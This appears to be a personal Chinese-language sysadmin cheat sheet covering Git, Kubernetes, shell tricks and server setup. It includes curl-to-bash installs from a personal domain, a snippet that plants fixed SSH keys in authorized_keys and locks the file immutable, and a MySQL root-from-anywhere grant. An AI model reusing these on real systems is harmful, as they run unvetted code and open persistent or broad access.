pd.set_option('display.max_columns', 1000) #最大列数
pd.set_option('display.width', 10000) #页面宽度call pip3 install aliyun-python-sdk-core
pip3 install aliyun-python-sdk-dyvmsapi
tcp netstat -n|awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'sh cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -q -y install vim bash-completion
fi
if [ "$OS" = "Debian" ]
then apt-get -q -y install vim bash-completion
fi
curl -sLo /etc/profile.d/xabc_bash.sh https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/xabc_bash.sh
git git clone https://gitlab.glority.cn/operation/matrix-build.git ./build (clone 到指定目录)
整理的常用 Git 命令清单。几个专用名词的译名如下。
Workspace:工作区
Index / Stage:暂存区
Repository:仓库区(或本地仓库)
Remote:远程仓库
当你修复完线上问题,切回 feature 分支,想恢复代码也只需要:git stash apply
相关命令# 保存当前未commit的代码
git stash
# 保存当前未commit的代码并添加备注
git stash save "备注的内容"
# 列出stash的所有记录
git stash list
# 删除stash的所有记录
git stash clear
# 应用最近一次的stash
git stash apply
# 应用最近一次的stash,随后删除该记录
git stash pop
# 删除最近的一次stash
git stash drop
一、新建代码库
在当前目录新建一个Git代码库 $ git init
新建一个目录,将其初始化为Git代码库 $ git init [project-name]
下载一个项目和它的整个代码历史 $ git clone [url]
二、配置
Git的设置文件为.gitconfig,它可以在用户主目录下(全局配置),也可以在项目目录下(项目配置)。
#显示当前的Git配置 $ git config --list
#编辑Git配置文件 $ git config -e [–global]
#设置提交代码时的用户信息 $ git config [–global] user.name “[name]”
$ git config [–global] user.email “[email address]”
三、增加/删除文件
#添加指定文件到暂存区 $ git add [file1] [file2] …
#添加指定目录到暂存区,包括子目录 $ git add [dir]
#添加当前目录的所有文件到暂存区 $ git add .
#添加每个变化前,都会要求确认 # 对于同一个文件的多处变化,可以实现分次提交 $ git add -p
#删除工作区文件,并且将这次删除放入暂存区 $ git rm [file1] [file2] …
#停止追踪指定文件,但该文件会保留在工作区 $ git rm --cached [file]
#改名文件,并且将这个改名放入暂存区 $ git mv [file-original] [file-renamed]
四、代码提交
#提交暂存区到仓库区 $ git commit -m [message]
#提交暂存区的指定文件到仓库区 $ git commit [file1] [file2] … -m [message]
#提交工作区自上次commit之后的变化,直接到仓库区 $ git commit -a
#提交时显示所有diff信息 $ git commit -v
#使用一次新的commit,替代上一次提交 # 如果代码没有任何新变化,则用来改写上一次commit的提交信息 $ git commit --amend -m [message]
#重做上一次commit,并包括指定文件的新变化 $ git commit --amend [file1] [file2] …
五、分支
#列出所有本地分支 $ git branch
#列出所有远程分支 $ git branch -r
#列出所有本地分支和远程分支 $ git branch -a
#新建一个分支,但依然停留在当前分支 $ git branch [branch-name]
#新建一个分支,并切换到该分支 $ git checkout -b [branch]
#新建一个分支,指向指定commit $ git branch [branch] [commit]
#新建一个分支,与指定的远程分支建立追踪关系 $ git branch --track [branch] [remote-branch]
#切换到指定分支,并更新工作区 $ git checkout [branch-name]
#切换到上一个分支 $ git checkout -
#建立追踪关系,在现有分支与指定的远程分支之间 $ git branch --set-upstream [branch] [remote-branch]
#合并指定分支到当前分支 $ git merge [branch]
#选择一个commit,合并进当前分支 $ git cherry-pick [commit]
#删除分支 $ git branch -d [branch-name]
#删除远程分支 $ git push origin --delete [branch-name]
$ git branch -dr [remote/branch]
六、标签
#列出所有tag $ git tag
#新建一个tag在当前commit $ git tag [tag]
#新建一个tag在指定commit $ git tag [tag] [commit]
#删除本地tag $ git tag -d [tag]
#删除远程tag $ git push origin :refs/tags/[tagName]
#查看tag信息 $ git show [tag]
#提交指定tag $ git push [remote] [tag]
#提交所有tag $ git push [remote] --tags
#新建一个分支,指向某个tag $ git checkout -b [branch] [tag]
git tag -a 2020-07-08 -m '2020-07-08'
git push 2020-07-08
七、查看信息
#显示有变更的文件 $ git status
#显示当前分支的版本历史 $ git log
#显示commit历史,以及每次commit发生变更的文件 $ git log --stat
#搜索提交历史,根据关键词 $ git log -S [keyword]
#显示某个commit之后的所有变动,每个commit占据一行 $ git log [tag] HEAD --pretty=format:%s
#显示某个commit之后的所有变动,其"提交说明"必须符合搜索条件 $ git log [tag] HEAD --grep feature
#显示某个文件的版本历史,包括文件改名 $ git log --follow [file]
$ git whatchanged [file]
#显示指定文件相关的每一次diff $ git log -p [file]
#显示过去5次提交 $ git log -5 --pretty --oneline
#显示所有提交过的用户,按提交次数排序 $ git shortlog -sn
#显示指定文件是什么人在什么时间修改过 $ git blame [file]
#显示暂存区和工作区的差异 $ git diff
#显示暂存区和上一个commit的差异 $ git diff --cached [file]
#显示工作区与当前分支最新commit之间的差异 $ git diff HEAD
#显示两次提交之间的差异 $ git diff [first-branch]…[second-branch]
#显示今天你写了多少行代码 $ git diff --shortstat “@{0 day ago}”
#显示某次提交的元数据和内容变化 $ git show [commit]
#显示某次提交发生变化的文件 $ git show --name-only [commit]
#显示某次提交时,某个文件的内容 $ git show [commit]:[filename]
#显示当前分支的最近几次提交 $ git reflog
八、远程同步
#下载远程仓库的所有变动 $ git fetch [remote]
#显示所有远程仓库 $ git remote -v
#显示某个远程仓库的信息 $ git remote show [remote]
#增加一个新的远程仓库,并命名 $ git remote add [shortname] [url]
#取回远程仓库的变化,并与本地分支合并 $ git pull [remote] [branch]
#上传本地指定分支到远程仓库 $ git push [remote] [branch]
#强行推送当前分支到远程仓库,即使有冲突 $ git push [remote] --force
#推送所有分支到远程仓库 $ git push [remote] --all
九、撤销
#恢复暂存区的指定文件到工作区 $ git checkout [file]
#恢复某个commit的指定文件到暂存区和工作区 $ git checkout [commit] [file]
#恢复暂存区的所有文件到工作区 $ git checkout .
#重置暂存区的指定文件,与上一次commit保持一致,但工作区不变 $ git reset [file]
#重置暂存区与工作区,与上一次commit保持一致 $ git reset --hard
#重置当前分支的指针为指定commit,同时重置暂存区,但工作区不变 $ git reset [commit]
#重置当前分支的HEAD为指定commit,同时重置暂存区和工作区,与指定commit一致 $ git reset --hard [commit]
#重置当前HEAD为指定commit,但保持暂存区和工作区不变 $ git reset --keep [commit]
#新建一个commit,用来撤销指定commit # 后者的所有变化都将被前者抵消,并且应用到当前分支 $ git revert [commit]
#暂时将未提交的变化移除,稍后再移入 $ git stash
$ git stash pop
十、其他
#查看远程分支和本地分支的对应关系 $git remote show origin
#从本地删除远程已经删除的分支的tracking(在issue被merge之后,远程分支会被删除,那么相应的本地tracking我们也可以删除掉) $git remote prune origin
#从本地删除远程已经删除的分支(merge后可以执行此操作保持工作区的清洁) $git fetch -p && for branch in `git branch -vv | grep ': gone]' | awk '{print $1}'`; do git branch -D $branch; done
#生成一个可供发布的压缩包 $ git archive
b cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y install vim wget bzip2 unzip rsync psmisc net-tools bind-utils telnet bash-completion
fi
if [ "$OS" = "Debian" ]
then apt-get -y install vim wget bzip2 unzip rsync psmisc net-tools dnsutils telnet
fialiyunexporter pip3 install aliyun-exporter
pip3 uninstall werkzeug
pip3 install PyYAML -U
pip3 install werkzeug==0.16.1tools cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y install vim wget bzip2 unzip rsync bash-completion git tmux inotify-tools axel jq
fi
if [ "$OS" = "Debian" ]
then apt-get -y insall vim wget bzip2 unzip rsync git tmux inotify-tools luajit jq
fiupx curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/upx -o /usr/local/bin/upx
chmod +x /usr/local/bin/upxuninstall cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ]
then yum -y erase
fi
if [ "$OS" = "Debian" ]
then echo hello
fikubectl # kubectl edit deployment filelist -n htdz 查看deployment 中 filelist 的模版
#curl -LO https://dl.k8s.io/release/v1.21.0/bin/linux/amd64/kubectl
#curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kubectl -O /usr/local/bin/kubectl
chmod +x /usr/local/bin/kubectlki curl -sLo /usr/local/bin/ki https://r2.xabc.io/ki.py
curl -sLo /etc/profile.d/zki.sh https://r2.xabc.io/zki.sh
chmod 755 /usr/local/bin/ki
printf "\033[1;32m%s\033[0m\n" "退出终端重新登录,输入指令 # ki 试试看"kompose wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/k8s/kompose -O /usr/local/bin/kompose
chmod +x /usr/local/bin/komposev wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~tf wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/terraform/terraform -O /usr/local/bin/terraform
chmod +x /usr/local/bin/terraform
/usr/local/bin/terraform -install-autocompletet ip addr | awk '/inet / {sub(/\/.*/, "", $2); print $2}'|grep -E '^10\.|^172\.1[6-9]\.|^172\.2[0-9]\.|^172\.3[0-1]\.|^192\.168\.'|head -1n hostnamectl --static set-hostnamek8stips
1.当将线上kubernetes宿主机的ARP参数都改大后,再也没有出现过此类问题了。
sysctl -w net.ipv4.neigh.default.gc_thresh3=32768
sysctl -w net.ipv4.neigh.default.gc_thresh2=16384
sysctl -w net.ipv4.neigh.default.gc_thresh1=8192
2.K8S故障排查指南- but volume paths are still present on disk
1.上面错误信息可以通过 journalctl -u kubelet -f 或者 tail -f /var/log/messages 命令查看到。
2. # 查看 etc-hosts 文件中 pod name 名称
$ cat /var/lib/kubelet/pods/9e6d9bdd-1554-45e6-8831-53e83f8ea263/etc-hosts
# 删除 9e6d9bdd-1554-45e6-8831-53e83f8ea263 目录
$ cd /var/lib/kubelet/pods/
$ rm -rf 9e6d9bdd-1554-45e6-8831-53e83f8ea263
3. 现在在通过 journalctl -u kubelet -f 命令看kubelet日志,就没有 Orphaned pod found - but volume paths are still present on disk 报错了。
3.走flannel的vxlan网络,vxlan需要放开udp/8472
4. 下面配置意味着单个负载会调度到一个剩余CPU request大于0.1核,剩余request内存大于200MB的节点,并且负载运行时的CPU使用率不能高于0.4核(超过将被限流),内存使用不多余300MB(超过将被OOM Kill并重启)
resources:
requests:
memory: 200Mi
cpu: "0.1"
limits:
memory: 300Mi
cpu: "0.4"
5. 使用 kubectl 来创建 TLS Secret 时,你可以像下面的例子一样使用 tls 子命令:
kubectl create secret tls my-tls-secret --cert=path/to/cert/file --key=path/to/key/file
# 镜像字体 fonts-dejavu
# /etc/sysctl.d/k8s.conf ( 确保 pod 之间 IP 互通)
net.bridge.bridge-nf-call-ip6tables = 1
net.ipv4.ip_forward = 1
net.bridge.bridge-nf-call-iptables = 1
6. kubectl get pod --field-selector=status.phase==Running
7. immutable: true ( 不可更改的 secret / configmap )
8. 访问某pod的某个容器: kubectl --namespace=default exec -it user-deployment-54469dd57-vg87g --container user -- sh
# kubectl scale deploy -n --replicas=1 --all 可以用用scale指令修改指定命名空间下所有的deploy的副本数量。
#设置k8s预留资源保护
#/etc/systemd/system/kubelet.service.d/10-kubeadm.conf
#Environment="KUBELET_CUSTOMIZED_ARGS1=--eviction-hard=imagefs.available<15%,memory.available<2Gi,nodefs.available<10%,nodefs.inodesFree<5% --system-reserved=memory=1Gi --kube-reserved=memory=400Mi --kube-reserved=pid=1000 --system-reserved=pid=1000"
# systemctl daemon-reload;systemctl restart kubelet (重启kubelet 生效)
#ingress配置增加注解(annotations):nginx.ingress.kubernetes.io/ssl-redirect: 'true' 就可以实现http强制跳转至https
#deployment
imagePullPolicy: IfNotPresent
1.简述Kubernetes中Pod可能位于的状态?
Pending:API Server已经创建该Pod,且Pod内还有一个或多个容器的镜像没有创建,包括正在下载镜像的过程。
Running:Pod内所有容器均已创建,且至少有一个容器处于运行状态、正在启动状态或正在重启状态。
Succeeded:Pod内所有容器均成功执行退出,且不会重启。
Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态。
Unknown:由于某种原因无法获取该Pod状态,可能由于网络通信不畅导致。
apt update && apt install telnet net-tools curl vim -y
2.alpine 镜像调试
apk add --no-cache busybox-extrasu ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\./'|head -1sk echo $(cat ./config | base64) |tr -d " "|openssl aes-256-cbc -salt -pbkdf2 -k $SALT > secret_kubeconfigip IP=${SSH_CONNECTION% *};IP=${IP##* };[ -n "$IP" ]||IP=$(ip -o -f inet addr|grep -v 'lo '|grep -Po '(?<=inet ).*(?=\/)'|awk '/^10\.|^172\.|^192\.|^100\./'|head -1);echo $IPshell #${#string} $string的长度
#${string:position} 在$string中, 从位置$position开始提取子串
#${string:position:length} 在$string中, 从位置$position开始提取长度为$length的子串
#${string#substring} 从变量$string的开头, 删除最短匹配$substring的子串
#${string##substring} 从变量$string的开头, 删除最长匹配$substring的子串
#${string%substring} 从变量$string的结尾, 删除最短匹配$substring的子串
#${string%%substring} 从变量$string的结尾, 删除最长匹配$substring的子串
#${string/substring/replacement} 使用$replacement, 来代替第一个匹配的$substring
#${string//substring/replacement} 使用$replacement, 代替所有匹配的$substring
#${string/#substring/replacement} 如果$string的前缀匹配$substring, 那么就用$replacement来代替匹配到的$substring
#${string/%substring/replacement} 如果$string的后缀匹配$substring, 那么就用$replacement来代替匹配到的$substring
#大小写转换
$ test="abcDEF"
# 把变量中的第一个字符换成大写
$ echo ${test^}
AbcDEF
# 把变量中的所有小写字母,全部替换为大写
$ echo ${test^^}
ABCDEF
# 把变量中的第一个字符换成小写
$ echo ${test,}
abcDEF
# 把变量中的所有大写字母,全部替换为小写
$ echo ${test,,}
abcdef
${VALUE:-WORD}:当变量未定义或者值为空时,返回值为WORD的内容,否则返回变量的值。
${VALUE:=WORD}:当变量未定义或者值为空时,返回WORD的值的同时并将WORD赋值给VALUE,否则返回变量的值。
${VALUE:+WORD}:当变量已赋值时,其值才用WORD替换,否则不进行任何替换。
${VALUE:?MESSAGE}:当变量已赋值时,正常替换。否则将消息MESSAGE送到标准错误输出(若此替换出现在SHELL程序中,那么该程序将终止运行)。
补充:WORD可以为一个字符串,也可以为一个变量。当为变量时,需要用“$”引用该变量。
颜色指令
0 : Reset Color Attributes
1 : 加粗
2 : 去粗
4 : 下划线
5 : 闪烁
7 : 反色
21/22 : 加粗 正常
24 : 去掉下划线
25 : 停止闪烁
27 : 反色
30 : 前景,黑色
31 : 前景,红色
32 : 前景,绿色
33 : 前景,黄色
34 : 前景,篮色
35 : 前景,紫色
36 : 前景,青色
37 : 前景,白色
40 : 背景,黑色
41 : 背景,红色
42 : 背景,绿色
43 : 背景,黄色
44 : 背景,篮色
45 : 背景,紫色
46 : 背景,青色
47 : 背景,白色
其它转义字符命令
清除屏幕 : /033c
设定水平标位置 : /033[XG
X为水平标位置。
设定垂直标位置 : /033[Xd
Y为垂直标位置。
/033[0K : 删除从标到该行结尾
/033[1K : 删除从该行开始到标处
/033[2K : 删除整行
/033[0J : 删除标到萤幕结尾
/033[1J : 删除从萤幕开始到标处
/033[2J : 删除整个屏幕r echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/redis.tgz -O -|tar xzf - -C /tmp
mv /tmp/redis/files/redis-$OS /opt/redis
rm -rf /tmp/redis/
mkdir -p /opt/redis/conf
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/redis.conf -O /opt/redis/conf/redis.conf
chmod 100 /opt/redis/bin/*
pgrep redis||/opt/redis/bin/redis-server /opt/redis/conf/redis.conf
ps aux|grep redistips # 编译 openresty
# wget -t 3 https://openresty.org/download/openresty-1.21.4.3.tar.gz -O -|tar xzf -
# wget -t 3 https://zlib.net/current/zlib.tar.gz -O -|tar xzf -
# yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang zlib-devel
#./configure --prefix=/home/ywgx/0/openresty --with-pcre-jit --with-stream --with-stream_ssl_preread_module --with-stream_ssl_module --with-http_v2_module --with-http_iconv_module --without-http_limit_req_module --without-http_limit_conn_module --without-http_split_clients_module --without-poll_module --without-select_module --without-http_fastcgi_module --without-http_uwsgi_module --without-http_scgi_module --without-http_memcached_module --without-http_ssi_module --without-http_geo_module --without-http_empty_gif_module --without-http_browser_module --without-http_upstream_ip_hash_module --without-http_upstream_least_conn_module --without-http_upstream_zone_module --with-zlib=../zlib
# nginx 跨域配置
add_header 'Access-Control-Allow-Origin' '*' always;
add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always;
add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always;
add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always;
if ($request_method = 'OPTIONS') {
add_header 'Access-Control-Allow-Origin' '*' always;
add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always;
add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always;
add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always;
add_header 'Access-Control-Max-Age' 1728000;
return 204;
}
#查询命令安装包 yum provides envsubst 或者 yum whatprovides envsubst
#标准输出 /dev/stdout
#标准输入 /dev/stdin
#标准错误输出 /dev/stderr
#nfs 依赖 yum -y install nfs-utils
#sftp 可以 ftp 不行的问题,查看 getsebool allow_ftpd_full_access 如果是 off ,可以打开 setsebool allow_ftpd_full_access
#pip3 install -U pip setuptools
#pip3 download -d packages/ -r requirements.txt 把依赖包都下到packages文件夹里
#pip3 install --no-index --find-links=packages/ -r requirements.txt 离线安装
#pip3 freeze > requirements.txt
# problem making ssl connection
先把 /etc/yum.repos.d/rdo-release.repo里的enabled=0,禁用掉
在执行yum install ca-certificates
# RPM 数据库问题 'yum check' 解决方法
package-cleanup --cleandupes
# module_name = shell 将默认的模块改为shell,command模块功能太弱
ansible AppGroup -m shell -a 'w'
#查看域名 dns
dig baidu.com +nssearch
#显示连接用户信息
ss -tapo dport = :3306
#可以使用以下命令查使用内存最多的10个进程
ps -aux | sort -k4nr | head -n 10
#可以使用一下命令查使用CPU最多的10个进程
ps -aux | sort -k3nr | head -n 10
# 物理内存大小 = 物理已使用的内存 + 物理没使用的内存
total = used + free
# 可用内存大小 = 物理没使用的内存 + 缓冲 + 缓存
available = free + buffers + cached
# 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100
percent = (total - available) / total * 100
/etc 系统文件属性恢复
#restorecon -Rv /etc
PATH=$PATH:$HOME/.local/bin:$HOME/bin
查看某进程的文件打开数
cat /proc//limits
ls -lh /proc//fd
ls -lh /proc//fd|wc -l
import salt.client
local = salt.client.LocalClient()
print(help(local.cmd))
find . -type f | parallel -j+0 grep -i foobar 并发的grep
systemctl list-unit-files --type=service|grep enabled
ulimit -n # 查看当前用户可用最大句柄
sysctl -a | grep fs.file-max # 查看内核级的文件句柄最大限制值
cat /proc/sys/fs/file-nr # 查看当前已用的文件句柄数量 和 内核级的文件句柄限制的最大值
乱码转换
:set fileencoding=UTF-8
:x!
TAB替换为空格:
:se ts=4
:se et
:%retab!
空格替换为TAB:
:se ts=4
:se noet
:%retab!
curl 2 python: https://curl.trillworks.com
au BufNewFile,BufRead *.py se ts=4 sts=4 sw=4 et
k8s
minikube start --driver=hyperv --memory=4096m --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers
/etc/security/limits.conf (注意同时要留意 /etc/security/limits.d/下面的参数)
root soft nofile 65535
root hard nofile 65535
* soft nofile 65535
* hard nofile 65535
* soft nproc 65535
* hard nproc 65535
还要追加下面一行给(/etc/pam.d/login)
session required pam_limits.so
usermod -aG wheel ywgx (把 ywgx 添加入wheel分组)
rsync -av --progress --delete /tmp/abc ywgx@base.xabcstack.com:/tmp/ (这个会把当前主机 /tmp/abc 同步到目标机器 /tmp/ 目录下,如果没有自动创建abc目录)
rsync --daemon --config=./rsyncd.conf
rsync -aq --progress root@repo.xabcstack.com::salt .
rsync -aq --progress --delete --exclude={"COMMIT",} /cache/sys root@172.18.10.144:/cache/ (把当前主机 /cache/sys 目录同步到目标机器 /cache/, 跳过/cache/sys/COMMIT 这个目录 )
return 301 https://$host$request_uri;
awk '{ print $(NF-2) }'
scp -P 12349 upload_file username@server
echo "*/5 * * * * pgrep sentinel.py||/srv/zero/sentinel.py &>/var/log/xabc.log &" > /var/spool/cron/root
for i in `find /root/.jenkins/jobs -maxdepth 6 -name "[0-9]*" -a -mtime +3`;do rm -rf $i;done
*/5 * * * * pgrep nginx||/opt/openresty/nginx/sbin/nginx
netstat -aulntp
nc -vuz 100.67.1.217 514 (探测主机100.67.1.217 UDP 514 端口是否打开)
Influxdata 数据备份和恢复
备份:
influxd backup -database database_name 数据存储位置
influxd backup -database database_name -host localhost:8088 数据存储位置 # 远程备份
恢复元数据:
influxd restore -metadir /var/lib/influxdb/meta/ 元数据存储位置
influxd restore -database database_name -datadir /var/lib/influxdb/data 数据存储位置
修改权限:
chown -R influxdb:influxdb /var/lib/influxdb
重启influxdb:
service influxdb stop
service influxdb start
磁盘挂载
1. fdisk -l
2. mkfs.ext4 /dev/vd{x}
3. mount /dev/vd{x} /media
4. vim /etc/fstab
/dev/vd{x} /media ext4 defaults 0 0
时区设置
timedatectl set-timezone Asia/Shanghai
timedatectl 查看时间设置
chronyc sources -v 查看时间同步状态
提示Read-only file system,执行命令 mount -o remount rw /
同步本地时间到硬件
hwclock --systohc
通过redis-cli导入数据
通过在ECS上的redis-cli,可将用户ECS上原有的数据导入到云数据库Redis版中,操作代码为:
# redis-cli -h old_instance_ip -p old_instance_port config set appendonly yes
# redis-cli -h aliyun_redis_instance_ip -p 6379 -a password --pipe < appendonly.aof
# terraform
terraform version 查看 Terraform 版本
terraform init 初始化 Terraform
terraform plan Terraform 执行计划
terraform apply 应用 Terraform
terraform show 检查 Terraform 状态
terraform output 查看输出变量的值
terraform graph 生成资源依赖图
terraform destroy 销毁资源
terraform workspace 管理 Terraform 工作区
terraform workspace new 新建工作区
terraform workspace list 列出工作区
terraform workspace select 切换工作区
terraform workspace delete 删除工作区
terraform get 下载或更新 Terraform 模块
terraform fmt 格式化 Terraform 代码
terraform validate 检查 Terraform 语法
terraform console Terraform 控制台
iptables -I INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -t mangle -I POSTROUTING -p tcp -m tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1024
firewall
systemctl start firewalld
firewall-cmd --reload
firewall-cmd --permanent --add-service=http
firewall-cmd --permanent --add-service=https
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES;i if [ $USER = ywgx ];then
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitconfig -O ~/.gitconfig
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitignore -O ~/.gitignore
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.my.cnf -O ~/.my.cnf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.wgetrc -O ~/.wgetrc
if ! grep -q "ge4MSI5hlWSw" ~/.ssh/authorized_keys &>/dev/null;then
[ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDHZyWeFOHuHtLgsGLNx4sCYVXv/FfFi3ZcTSOSyX2oRgRm4xflPDgJHGSlCjtP2IluM6gG+o9+fS0WpcQkiaabe4wJVf5/hdFvJY7BgG4SslmdYGGtXKqFKXLq0pkuQQTnitBYQvAwEjBuHYB0KuuJG1XSss3ubzTZzoveeIVOJgamoGgm42D2G0ZOAH7ovRj3eFvjJImepaSJEDUe1SbNHoptSQvLMV+y5LDNb7xxRUk4hH09o/f2O9jxPbxL8f9nP94ZoT2XjVhvKRKVz51AHs9pNTry7ge4MSI5hlWSwjiFO+jJLuIiGdRGVxEzToMOkPBaH3HXs1pJHu+/9fqCwvgW4+Wp7FTBhPmX/9VSjGpO+uwlj3zRZHyDxs3Enup+Bok/WH9e5GLQj/KzWQD6s/6s0/9UC9YfZRU7E+uRvXf21zpAkmaGGQsOv5FV7ZqciYRn66dq65ahx2xmi4hkBoTrdP595lRPuQEOW1ziTI08pxU9eZA/f/s4AsQL/IHU9LkiA8gqGXlembuBxL20OietQTLn5AYev6rmU0m4IZ1yKu2AzT5gaG//8XuSGzT0o8ppvSgIalDBnS+W/2xQCc0xGY7yX51MIdc+E7edWw14VqL0ESXIHZfB7uOGOAMjfMP3GIoHOIatI+rsd8D30sKEEBXDYAgwu2yZgskGmw== ywgx" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys
fi
if ! grep -q "Ogsuw71ublt" ~/.ssh/authorized_keys &>/dev/null;then
[ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys
fi
fidba # 更改数据库 users 表里面字段名称
ALTER TABLE users RENAME COLUMN request_count TO requests;
j echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/java.tgz -O -|tar xzf - -C /tmp
tar xzf /tmp/java/files/jdk.tgz -C /opt
tar xzf /tmp/java/files/tomcat.tgz -C /opt
mv /tmp/java/files/*.sh /etc/profile.d/
rm -rf /tmp/java/
echo "/opt/{jdk,tomcat}"gitlab Git 全局设置
git config --global user.name "Administrator"
git config --global user.email "admin@example.com"
创建一个新仓库
git clone git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
cd Monitoring
touch README.md
git add README.md
git commit -m "add README"
git push -u origin master
推送现有文件夹
cd existing_folder
git init
git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
git add .
git commit -m "Initial commit"
git push -u origin master
推送现有的 Git 仓库
cd existing_repo
git remote rename origin old-origin
git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
git push -u origin --all
git push -u origin --tags
查找版本号
git log --oneline
重置到某一版本
git reset --hard 版本号
m yum -y install wget
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum -y install salt-minion
systemctl enable salt-minion.serviceerr tail -f access.log|awk '$1 > 399 {print $0}'o echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt
